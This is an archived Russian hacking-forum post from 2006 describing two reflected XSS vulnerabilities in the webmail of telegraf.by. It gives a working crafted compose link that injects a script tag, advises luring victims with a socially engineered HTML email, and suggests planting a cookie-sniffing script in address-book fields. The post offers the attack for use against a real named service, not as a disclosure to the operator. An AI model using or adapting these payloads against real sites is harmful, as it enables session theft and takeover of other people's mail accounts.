ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

2 XSS(passive) на telegraf.by (почта)
  #1  
Старый 29.04.2006, 23:48
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


Smile 2 XSS(passive) на telegraf.by (почта)

Юзаем свои неисчерпаемые навыки соц. инженерии. Пишем в виде хтмл письмо с содержанием типа:


...бла-бла-бла... НАпиши мне! написать по-быстрому мона тут:


< a href='http://mail.telegraf.by/compose.pl?func=new&To=[_наше мыло_]"><script>alert("xaxa")</script><input type="text&Cc=[">XSS]&Bcc=[">XSS]&back=abook.pl&f=open'>ТУТ!</a>

откроется страничка в которой в поле для КОМУ будет наше мыло. А тем временем вылетит алерт =) (ха, а алерт ли нам нужен? )


Ещё заходим в адресную книгу и там заполняем поля фамилия, имя, мыло любимым скриптом для вставки сниффера

Последний раз редактировалось b00zy_c0d3r; 29.04.2006 в 23:56..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Почта на халяве jaim PHP, PERL, MySQL, JavaScript 3 10.04.2006 16:40
Какая почта надежнее? Chek E-Mail 36 02.03.2006 15:57
Почта Dr.ZaX ICQ 11 14.02.2006 14:35
Почта Чаты 9 28.08.2002 02:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ